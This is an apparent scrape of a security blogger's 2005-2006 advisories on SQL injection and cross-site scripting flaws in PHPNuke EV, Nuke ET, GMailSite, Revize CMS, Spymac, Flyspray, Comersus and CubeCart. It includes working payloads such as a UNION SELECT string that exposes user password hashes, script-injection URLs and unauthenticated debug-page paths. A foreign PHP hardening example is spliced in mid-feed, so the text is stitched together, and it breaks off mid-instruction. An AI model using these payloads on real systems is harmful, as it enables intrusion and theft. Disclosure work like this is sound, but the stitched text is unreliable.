Currently I have found a possible fix; see<br /><br />
http://lostmon.blogspot.com/2006/01/manual-fix-for-cross-site-scripting.html<br /><br />
or<br /><br />
http://bugs.cubecart.com/?do=details&id=459<br /><br /><br />
##################### €nd ########################<br /><br />
Thanks to Estrella for being my light<br />
Thanks to all the manglers of http://www.osvdb.org<br /><br />
--<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1136821664277095352006-01-09T07:45:00.000-08:002006-01-12T03:24:09.526-08:00PHPNuke EV 7.7 'search' module 'query' variable SQL injection###############################################<br />
PHPNuke EV 7.7 'search' module 'query' variable SQL injection<br />
Vendor url: http://nukevolution.com/<br />
Exploit available: yes Vendor notified: yes<br />
Advisory: http://lostmon.blogspot.com/2006/01/phpnuke-ev-77-search-module-query.html<br />
OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=22316" target="_BLANK">22316</a> Related OSVDB: <a href="http://osvdb.org/displayvuln.php?osvdb_id=21002" target="_BLANK">21002</a> and <a href="http://osvdb.org/displayvuln.php?osvdb_id=20866" target="_BLANK">20866</a><br />
BID: <a href="http://www.securityfocus.com/bid/16186" target="_BLANK">16186</a><br />
Secunia: <a href="http://secunia.com/advisories/18394/" target="_BLANK">SA18394</a> Related Secunia: <a href="http://secunia.com/advisories/17638/" target="_BLANK">SA17638</a> and <a href="http://secunia.com/advisories/17543/" target="_BLANK">SA17543</a><br />
################################################<br /><br />
PHPNuke EV 7.7 has a flaw which can be exploited by malicious<br />
people to conduct SQL injection attacks.<br /><br />
Input passed to the "query" parameter when performing a search isn't<br />
properly sanitised before being used in a SQL query. This can be<br />
exploited to manipulate SQL queries by injecting arbitrary SQL code.<br /><br />
#################<br />
Versions:<br />
################<br /><br />
PHPNuke EV 7.7 -R1<br /><br />
Prior versions are possibly affected.<br /><br />
##################<br />
Solution:<br />
###################<br /><br />
No solution at this time!!!<br /><br />
A possible fix:<br /><br />
Open the file modules/Search/index.php and after this code:<br />
------------------------------------<br />
require_once("mainfile.php");<br />
$instory = '';<br />
$module_name = basename(dirname(__FILE__));<br />
get_lang($module_name);<br />
----------------------------------------------<br /><br />
add this:<br /><br />
------------------------------------<br /><br />
// "simple fix": abort the request if the query variable contains UNION SELECT<br />
if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){<br />
die();<br />
}<br />
----------------------------------------------<br />
This is a "simple fix": it only detects the UNION SELECT command and dies<br />
if it appears in the query variable. You can write the same code<br />
for UNION ALL SELECT or other variants of the exploit.<br /><br /><br />
####################<br />
Timeline<br />
####################<br /><br />
Discovered: 21-11-2005<br />
Vendor notified: 29-12-2005 (forums)<br />
Vendor response: -------<br />
Vendor fix: -----<br />
Disclosure: 09-01-2006<br /><br />
###################<br />
Example:<br />
###################<br /><br />
Go to<br />
http://[Victim]/modules.php?name=Search<br /><br />
and write this proof in the search box:<br /><br />
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*<br /><br />
All user hashes become viewable.<br /><br />
#################### €nd ########################<br /><br />
Thanks to Estrella for being my light<br /><br /><br />
--<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1135858279576835452005-12-29T04:05:00.000-08:002005-12-30T07:45:31.466-08:00GMailSite variable Cross-Site Scripting and script injection#######################################################<br />
GMailSite variable Cross-Site Scripting and script injection<br />
Vendor Url: http://www.gmailsite.com/<br />
Vendor specific entry: http://foros.ojobuscador.com/tema1936.html<br />
Advisory: http://lostmon.blogspot.com/2005/12/gmailsite-variable-cross-site.html<br />
Vendor notified: yes Exploit available: yes<br />
OSVDB ID: <a href="http://www.osvdb.org/displayvuln.php?osvdb_id=22083" target="_BLANK">22083</a>, <a href="http://www.osvdb.org/displayvuln.php?osvdb_id=22095" target="_BLANK">22095</a><br />
Secunia: <a href="http://secunia.com/advisories/18155/" target="_BLANK">SA18155</a><br />
BID: <a href="http://www.securityfocus.com/bid/16081" target="_BLANK">16081</a><br />
########################################################<br /><br />
GMailSite is a script that lets you use your GMail account<br />
to create a page on which all the attachments of the messages<br />
kept under a given label in your mail account are published.<br /><br />
GMailSite contains a flaw that allows a remote<br />
Cross-Site Scripting attack. This flaw exists because<br />
the application does not validate the 'lng' variable upon<br />
submission to the index.php script. This could allow a user<br />
to create a specially crafted URL that would execute<br />
arbitrary code in a user's browser within the trust<br />
relationship between the browser and the server,<br />
leading to a loss of integrity.<br /><br />
When we "inject" HTML or JavaScript code into the 'lng'<br />
variable, the code is written to the cookie and is<br />
executed every time we click a link in GMailSite;<br />
to stop it you only need to click another language.<br />
This flaw is a possible script insertion and a possible<br />
local file inclusion.<br /><br />
#################<br />
Versions affected<br />
#################<br /><br />
GMailSite<br /><br />
GmailSite 1.0.4<br />
GmailSite 1.0.3<br />
GmailSite 1.0.2<br />
GmailSite 1.0.1<br />
GmailSite 1.0<br /><br />
GFHost<br /><br />
GFHost 0.4.2<br />
GFHost 0.4.1<br />
GFHost 0.4<br />
GFHost 0.3<br />
GFHost 0.2<br />
GFHost 0.1.1<br /><br />
#################<br />
Solution<br />
#################<br /><br />
No solution at this time !!!<br /><br />
#############<br />
Timeline<br />
#############<br /><br />
Discovered: 13-11-2005<br />
Vendor notified: 28-12-2005<br />
Vendor response: 28-12-2005<br />
Disclosure: 29-12-2005<br /><br />
##################<br />
Example<br />
##################<br /><br />
http://[VICTIM]/?lng=es"><script>alert(document.cookie)</script><br />
http://[VICTIM]/index.php?lng=es"><script>alert(document.cookie)</script><br /><br />
##################### €nd ###############<br /><br />
Thanks to Estrella for being my light<br /><br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1132579360239997042005-11-21T05:21:00.000-08:002005-11-24T01:14:13.473-08:00Nuke ET 'search' module 'query' variable SQL injection###############################################<br />
Nuke ET 'search' module 'query' variable SQL injection<br />
Vendor url: www.truzone.org<br />
Exploit available: yes Vendor notified: yes<br />
Advisory: http://lostmon.blogspot.com/2005/11/nuke-et-search-module-query-variable.html<br />
OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=21002" target="_BLANK">21002</a><br />
Secunia: <a href="http://secunia.com/advisories/17638/" target="_BLANK">SA17638</a><br />
BID: <a href="http://securityfocus.com/bid/15519" target="_BLANK">15519</a><br />
################################################<br /><br />
Nuke ET has a flaw which can be exploited by malicious people to<br />
conduct SQL injection attacks.<br /><br />
Input passed to the "query" parameter when performing a search isn't<br />
properly sanitised before being used in a SQL query. This can be<br />
exploited to manipulate SQL queries by injecting arbitrary SQL code.<br /><br />
#################<br />
Versions:<br />
################<br /><br />
Nuke ET 3.2<br />
Prior versions are possibly affected.<br /><br />
##################<br />
Solution:<br />
###################<br /><br />
The vendor has released a fix:<br /><br />
<a href="http://www.truzone.org/modules.php?name=DescNuke&d_op=getit&lid=1557" target="_BLANK">http://www.truzone.org/modules.php?name=DescNuke&d_op=getit&lid=1557</a><br /><br />
Apply the fix as fast as possible.<br /><br />
####################<br />
Timeline<br />
####################<br /><br />
Discovered: 21-11-2005<br />
Vendor notified: 21-11-2005<br />
Vendor response: 21-11-2005<br />
Vendor fix: 21-11-2005<br />
Disclosure: 21-11-2005<br /><br />
###################<br />
Example:<br />
###################<br /><br />
Go to<br />
http://[Victim]/modules.php?name=Search<br /><br />
and write this proof in the search box:<br /><br />
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*<br /><br />
All user hashes become viewable.<br /><br />
#################### €nd ########################<br /><br />
Thanks to Estrella for being my light<br />
Thanks to Truzone<br />
Thanks to RiXi<br />
--<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
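The Nuke ET advisory above describes a search string that is concatenated straight into a SQL statement, which is why a quote character in the "query" parameter can change the statement itself. The following PHP is an added example, not Nuke ET's or Truzone's code: it shows that concatenating pattern beside a prepared-statement version in which the user value can only ever be compared as data. The nuke_stories table, its sid and title columns, the function names and the connection settings are assumptions for illustration.

```php
<?php
// Added example (not Nuke ET code). Table/column names, function names
// and the connection settings below are assumptions for illustration.
declare(strict_types=1);

/**
 * The pattern the advisory describes: the raw search string becomes part
 * of the SQL text, so quote characters in it alter the statement.
 * Kept only for contrast; it is never called.
 */
function buildSearchSqlUnsafe(string $query): string
{
    return "SELECT sid, title FROM nuke_stories WHERE title LIKE '%" . $query . "%'";
}

/**
 * Hardened form: the SQL text is fixed and the user value travels as a
 * bound parameter, so it is compared as data and cannot change the
 * statement's structure. LIKE's own wildcards are escaped as well, so a
 * search for "100%" matches literally instead of matching everything.
 */
function searchStories(PDO $db, string $query, int $limit = 20): array
{
    $pattern = '%' . strtr($query, ['!' => '!!', '%' => '!%', '_' => '!_']) . '%';

    $stmt = $db->prepare(
        "SELECT sid, title FROM nuke_stories WHERE title LIKE :pattern ESCAPE '!' LIMIT :lim"
    );
    $stmt->bindValue(':pattern', $pattern, PDO::PARAM_STR);
    $stmt->bindValue(':lim', $limit, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** Connection with prepare emulation off (assumed DSN and credentials). */
function connect(): PDO
{
    return new PDO(
        'mysql:host=127.0.0.1;dbname=nuke;charset=utf8mb4',
        'nuke_app',
        getenv('NUKE_DB_PASSWORD') ?: '',
        [
            PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepared statements
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        ]
    );
}

// Usage: with the prepared statement, the advisory's proof-of-concept string
// is nothing more than a (non-matching) literal search term.
$userInput = $_GET['query'] ?? "s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*";
$rows = searchStories(connect(), $userInput);
printf("%d matching stories\n", count($rows));
foreach ($rows as $row) {
    // Output encoding on the way out, so a stored title cannot inject markup either.
    printf("%d %s\n", $row['sid'], htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8'));
}
```

The ESCAPE clause matters because binding a parameter only protects the SQL structure; without escaping, a user-supplied "%" still turns the LIKE into a match-all, which is a data-exposure issue of its own on search endpoints.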
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1132144214538694992005-11-16T03:54:00.000-08:002005-11-18T05:36:03.010-08:00Revize(r) CMS SQL information disclosure and XSS#######################################################<br />Revize(r) CMS SQL information disclosure and XSS<br />Vendor url:http://www.idetix.com<br />Advisore:http://lostmon.blogspot.com/2005/11/<br />revizer-cms-sql-information-disclosure.html<br />Vendor notify: exploit available:yes<br />OSVDB ID: <a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20918" target="_BLANK">20918</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20919" target="_BLANK">20919</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20920" target="_BLANK">20920</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20921" target="_BLANK">20921</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20922" target="_BLANK">20922</a><br />Securitytracker:<a href="http://securitytracker.com/id?1015231" target="BLANK">1015231</a><br />Secunia:<a href="http://secunia.com/advisories/17623/" target="_BLANK">SA17623</a><br />BID:<a href="http://securityfocus.com/bid/15481" target="_BLANK">15481</a>,<a href="http://securityfocus.com/bid/15482" target="_BLANK">15482</a>,<a href="http://securityfocus.com/bid/15484" target="_BLANK">15484</a><br />#######################################################<br /><br />The Revize(r) Web Content Management System enables<br />non-technical content contributors to quickly and easily<br />keep their Web Pages up-to-date. Revize can be applied<br />to a sophisticated, mature site or to the development of<br />a new Web Site from the ground up. 
And Revize is powerful<br />enough to manage Web content for any large organization.<br />Or, Revize can be localized into one or more departments.<br /><br />Input passed to the "query" parameter in "query_results.jsp"<br />isn't properly sanitised before being used in a SQL query.<br />This can be exploited to manipulate SQL queries by injecting<br />arbitrary SQL code.<br /><br />This may allow a remote attacker to execute or manipulate SQL<br />queries in the backend database.<br /><br />A remote user can also obtain sensitive data about the target<br />system by requesting 'revize.xml', located in the 'conf'<br />directory, directly. The usual URL for this flaw is:<br />http://[victim]/revize/conf/<br /><br />#################<br />version<br />#################<br /><br />Unknown version of Revize(r) CMS<br /><br />##################<br />solution<br />##################<br /><br />No solution at this time.<br /><br />###################<br />Timeline<br />###################<br /><br />Discovered: 02-11-2005<br />vendor notify:14-11-2005<br />vendor response:<br />disclosure:16-11-2005<br /><br />#######################<br />examples<br />#######################<br /><br />SQL command:<br /><br />http://[Victim]/revize/debug/query_results.jsp?<br />webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects<br /><br />http://[Victim]/revize/debug/query_results.jsp?query=<br />select%20*%20from%20pbpublic.rSubjects<br /><br />http://[Victim]/revize/debug/query_input.jsp?<br />table=rSubjects&apptable&webspace=REVIZE<br /><br />Admin bypass?<br /><br />http://[Victim]/revize/debug/<br /><br />At this URL the page shows a login form, but clicking any link<br />returns relevant information about the site without needing<br />to log in.<br /><br /><br />http://[Victim]/revize/debug/apptables.html<br />http://[Victim]/revize/debug/main.html<br /><br />#####################<br />cross site scripting<br 
/>#####################<br /><br />http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/<br />admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3<br />Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap<br />=subject&error=admincenter/login.jsp<br /><br />http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/<br />admincenter/setWebSpace.jsp&action=login&resourcetype=security<br />&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/<br />script%3E&error=admincenter/login.jsp<br /><br />http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/<br />admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.<br />cookie)%3C/script%3E&action=login&resourcetype=security&objectmap<br />=subject&error=admincenter/login.jsp<br /><br /><br />################### €nd ############################<br /><br />Thanks to estrella for being my light<br /><br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1131098560842164192005-11-04T01:55:00.000-08:002005-11-18T05:26:36.790-08:00Spymac Web OS v4 blogs and notes multiple variable XSS#####################################################<br />Spymac Web OS v4 blogs and notes multiple variable XSS<br />Vendor url: http://www.spymac.com &<br />http://arnieshwartz.spymac.com/the_spymac_web_os.htm<br />Advisore: http://lostmon.blogspot.com/2005/11/<br />spymac-web-os-v4-blogs-and-notes.html<br />Vendor notify :yes exploit available: yes<br />OSVDB ID:<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20902" target="_BLANK">20902</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20903" target="_BLANK">20903</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20904" target="_BLANK">20904</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20905" target="_BLANK">20905</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20906" target="_BLANK">20906</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20907" target="_BLANK">20907</a><br /><br />#####################################################<br /><br /><br />Spymac is powered by an integrated collection of applications<br />(developed in-house)that together form "Spymac WOS". 
Spymac<br />WOS is an intelligent environment featuring patent-pending <br />technology that allows for the creation of an immersive and<br />visually-stunning Web experience.<br /><br />Spymac has a flaw that allows a remote cross site scripting attack.<br />This flaw exists because the application does not validate <br />multiple variables upon submission to multiple scripts.<br />This could allow a user to create a specially crafted URL<br />that would execute arbitrary code in a user's browser within<br />the trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br /><br />################<br />VERSIONS<br />################<br /><br />Spymac Web Os 4.0<br /><br />#########<br />Solution<br />#########<br /><br />No solution at this time <br /><br />##########<br />timeline<br />##########<br /><br />Discovered : 28 10 2005<br />Vendor notify: 02 11 2005<br />Vendor response: <br />Disclosure : 04-11-2005<br /><br /><br />###################<br />EXAMPLES<br />###################<br /><br />To exploit some of these issues you need to be logged in.<br /><br />###########<br />IN BLOGS<br />###########<br /><br />http://[Victim]/blogs/index.php?curr=349030[XSS-CODE]<br /><br />http://[Victim]/blogs/blog_newentry.php?inspire=134403[XSS-CODE]<br />&system=blogentries&title=Blogs%20now%20online<br /><br />http://[Victim]/blogs/blog_newentry.php?inspire=134403&system=<br />blogentries[XSS-CODE]&title=Blogs%20now%20online<br /><br />http://[Victim]/blogs/blog_newentry.php?inspire=134403&system=<br />blogentries&title=Blogs%20now%20online[XSS-CODE]<br /><br />http://[Victim]/blogs/blog_newentry_comment.php?entry=113733[XSS-CODE]<br /><br />http://[Victim]/blogs/blog.php?pageid=113733&caldate=1128146400[XSS-CODE]<br /><br />http://[Victim]/blogs/blog_edit_entry.php?entry=113733[XSS-CODE]<br /><br />http://[Victim]/blogs/blog.php?pageid=260&label=Cool%20Stuff<br />&caldate=1128146400[XSS-CODE]<br /><br />###########<br />IN NOTES<br 
/>###########<br /><br />http://[Victim]/notes/index.php?action=noteform&forwardid=469397[XSS-CODE]<br />http://[victim]/notes/index.php?action=delete_folder&del_folder=qq[XSS-CODE]<br />http://[Victim]/notes/index.php?curr=100&isread=asc[XSS-CODE]<br />http://[victim]/notes/index.php?curr=100&dateorder=asc[XSS-CODE]<br />http://[victim]/notes/index.php?curr=100&subjectorder=asc[XSS-CODE]<br />http://[victim]/notes/index.php?curr=100[XSS-CODE]<br />http://[victim]/notes/index.php?isread=asc[XSS-CODE]<br />http://[Victim]/notes/index.php?fromorder=asc[XSS-CODE]<br />http://[Victim]/notes/index.php?fromorder=asc&action=search_title[XSS-CODE]<br />http://[Victim]/notes/index.php?action=shownote&noteid=243633[XSS-CODE]<br />http://[Victim]/notes/index.php?action=noteform[XSS-CODE]&replyid=243633<br />http://[Victim]/notes/index.php?action=Inbox[XSS-CODE]<br />http://[Victim]/notes/index.php?totalnotes=&ppp=10&ppp=40[XSS-CODE]&action=Inbox<br />http://[Victim]/notes/index.php?totalnotes=[XSS-CODE]&ppp=10&ppp=30<br />http://[Victim]/notes/index.php?totalnotes=&ppp=10&ppp=40&totalreplies=asc[XSS-CODE]&action=Inbox<br />http://[Victim]/notes/index.php?action=noteform&touserid=172195[XSS-CODE]<br /><br />######################## €nd #########################<br /><br />Thanks to estrella for being my light<br /><br />-- <br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1130174068657301982005-10-26T10:13:00.000-07:002013-04-19T08:48:51.006-07:00Flyspray "The bug killer" multiple variable Cross-Site Scripting####################################################<br />
Flyspray "The bug killer" multiple variable Cross-Site Scripting<br />
vendor url:http://flyspray.rocks.cc/<br />
Vendor specific bug report: http://flyspray.rocks.cc/bts/task/703<br />
Advisory:http://lostmon.blogspot.com/2005/10/<br />
flyspray-bug-killer-multiple-variable.html<br />
vendor notify:yes exploit available:yes<br />
OSVDB ID:<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20326" target="_BLANK">20326</a><br />
Secunia:<a href="http://secunia.com/advisories/17316/" target="_BLANK">17316</a><br />
BID:<a href="http://www.securityfocus.com/bid/15209" target="_BLANK">15209</a><br />
#####################################################<br />
<br />
Flyspray is an uncomplicated, web-based bug tracking system for<br />
assisting with software development.<br />
<br />
Flyspray "The bug killer" contains a flaw that allows a remote<br />
cross site scripting attack. This flaw exists because the application<br />
does not validate multiple variables upon submission to the index.php<br />
script. This could allow a user to create a specially crafted URL that<br />
would execute arbitrary code in a user's browser within the trust <br />
relationship between the browser and the server,<br />
leading to a loss of integrity.<br />
<br />
##################<br />
versions<br />
##################<br />
<br />
Flyspray 0.9.7<br />
Flyspray 0.9.8<br />
Flyspray 0.9.8 (devel) <br />
<br />
<br />
##################<br />
solution<br />
##################<br />
<br />
Update to version Flyspray 0.9.8 update1<br />
<br />
###################<br />
TimeLine<br />
###################<br />
<br />
Discovered:20-10-2005<br />
Vendor notify:24-10-2005<br />
Vendor response:25-10-2005<br />
Disclosure:26-10-2005<br />
<br />
<br />
####################<br />
Examples<br />
####################<br />
<br />
http://[victim]/index.php?PHPSESSID=270ca5a0f7c1e5b2fd4c<br />
52b34cdfe546&tasks=&project=1&string=lala&type=&sev=&due=<br />
&dev=&cat=&status=&perpage=20<br />
<br />
The variables PHPSESSID, task, string, type, sev, due and dev are<br />
affected by XSS flaws.<br />
<br />
http://[victim]/index.php?tasks=all%22%3E%3Cscript<br />
%3Ealert%28%29%3C%2Fscript%3E&project=0<br />
<br />
The task variable is affected.<br />
<br />
http://[victim]/index.php?order=sev&project=1&tasks=&type=<br />
&sev=&dev=&cat=&status=&due=&string=&perpage=20&pagenum=0&<br />
sort=desc&order2=&sort2=desc<br />
<br />
The variables task, type, due, string and sort2 are<br />
affected by XSS flaws.<br />
<br />
########################## €nd #############################<br />
<br />
Thanks to estrella for being my light<br />
-- <br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1129487979047181142005-10-16T11:38:00.000-07:002005-10-18T09:23:27.373-07:00Comersus BackOffice Plus Cross site scripting#####################################################<br />Comersus BackOffice Plus Cross site scripting<br />Vendor url:http://www.comersus.com/demo.html<br />Advisore:http://lostmon.blogspot.com/2005/10/<br />comersus-backoffice-plus-cross-site.html<br />vendor notify:yes exploit available:yes<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=20032" target="_BLANK">20032</a><br />Secunia:<a href="http://secunia.com/advisories/17219/" target="_BLANK">17219</a><br />Securitytracker:<a href="http://securitytracker.com/id?1015064" target="_BLANK">1015064</a><br />BID:<a href="http://securityfocus.com/bid/15118" target="_BLANK">15118</a><br />######################################################<br /><br /><br />Comersus BackOffice Plus contains a flaw that allows a remote<br />cross site scripting attack.This flaw exists because the <br />application does not validate some variables upon submission to<br />comersus_backoffice_searchItemForm.asp script.This could allow<br />a user to create a specially crafted URL that would execute <br />arbitrary code in a user's browser within the trust relationship<br />between the browser and the server,leading to a loss of integrity.<br /><br />#############<br />version:<br />##############<br /><br />Comersus Backoffice plus<br /><br />###########<br />solution:<br />###########<br /><br />No solution was available at this time.<br /><br /><br />####################<br />Timeline<br />####################<br /><br />discovered: 24-09-2005<br />vendor notify:28-09-2005<br />vendor response:28-09-2005<br />vendor especific bug report: 7-10-2005<br />Vendor response:-----------<br />disclosure: 16-10-2005<br /><br 
/>##################<br />Proof of concept:<br />##################<br /><br />To exploit this flaw you must be logged in.<br /><br />http://[victim]/backOfficePlus/comersus_backoffice_searchItemForm.asp?<br />forwardTo1=[XSS-CODE]comersus_backoffice_listAssignedCategories.asp&<br />forwardTo2=[XSS-CODE]&nameFT1=[XSS-CODE]Select&nameFT2=[XSS-CODE]<br /><br />All variables are vulnerable to cross site<br />scripting.<br /><br />##################### €nd #####################<br /><br />Thanks to estrella for being my light<br />-- <br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1127926403154050352005-09-28T09:51:00.000-07:002005-10-07T10:41:28.360-07:00CubeCart™ 3.0.3 multiple variable Cross site scripting################################################<br />CubeCart™ 3.0.3 multiple variable Cross site scripting<br />Vendor url: www.cubecart.com<br />bug report:http://bugs.cubecart.com/?do=details&id=363<br />Advisore:http://lostmon.blogspot.com/2005/09/<br />cubecart-303-multiple-variable-cross.html<br />vendor confirmed: yes exploit avalable: yes <br />Fix available: yes<br />OSVDB ID:<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=19860" target="_BLANK">19860</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=19861" target="_BLANK">>19861</a><br />Securitytracker:<a href="http://securitytracker.com/id?1014984" target="_BLANK">1014984</a> <br />BID:<a href="http://securityfocus.com/bid/14962" target="_BLANK">14962</a><br />################################################<br /><br />CubeCart contains a flaw that allows a remote cross site scripting<br />attack.This flaw exists because the application does not validate <br />some variables upon submission to cart.php and index.php scripts.<br />This could allow a user to create a specially crafted URL that <br />would execute arbitrary code in a user's browser within the trust<br />relationship between the browser and the server,leading to a<br />loss of integrity.<br /><br />###############<br />VERSIONS<br />###############<br /><br />CubeCart™ 3.0.3 vulnerable <br />CubeCart™ 3.0.4 not vulnerable<br /><br />#################<br />Timeline<br />#################<br /><br />Discovered: 24 sep 2005<br />vendor notify: 24 sep 2005<br />Vendor response:26 sep 2005<br />Solution: 28 sep 2005<br />Disclosure:24 sep 2005 <br />Public disclosure: 28 sep 2005<br /><br />###############<br />Examples:<br 
/>###############<br /><br />http://[victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVt<br />by9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcH<br />QlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZ<br />XdDYXQmYW1wO1N1Ym1pdD1Hbw==[XSS-CODE]<br /><br />http://[victim]/cc3/cart.php?act=reg&redir=[XSS-CODE]<br /><br /><br />http://[victim]/cc3/index.php?searchStr=%3D%22%3E%3Cscript<br />%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat<br />&Submit=Go<br /><br />http://[victim]/cc3/index.php?act=login&redir=L3NpdG<br />UvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb<br />2NJZD0x[XSS-CODE]<br /><br />#############<br />SOLUTION <br />#############<br /><br />The vendor has released a fix, and the latest version of<br />CubeCart is available for download at the following URI:<br /><br />http://www.cubecart.com/site/forums/index.php?download=222<br /><br />Thanks to the whole CubeCart team, they did very good work!<br /><br />################################################<br />MANUAL FIX<br />################################################<br />///////////////////////////////////////<br />// 1. 
Open: /includes/content/reg.inc.php<br />////////<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Find at around line 123:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$redir = base64_decode($_GET['redir']);<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Replace with:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$redir = base64_decode(treatGet($_GET['redir']));<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Find at around line 170:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$reg->assign("VAL_ACTION","cart.php?act=reg&<br />redir=".$_GET['redir']);<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Replace with:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$reg->assign("VAL_ACTION","cart.php?act=reg&<br />redir=".treatGet($_GET['redir']));<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Save, close and upload this file.<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />///////////////////////////////////////<br />// 2. 
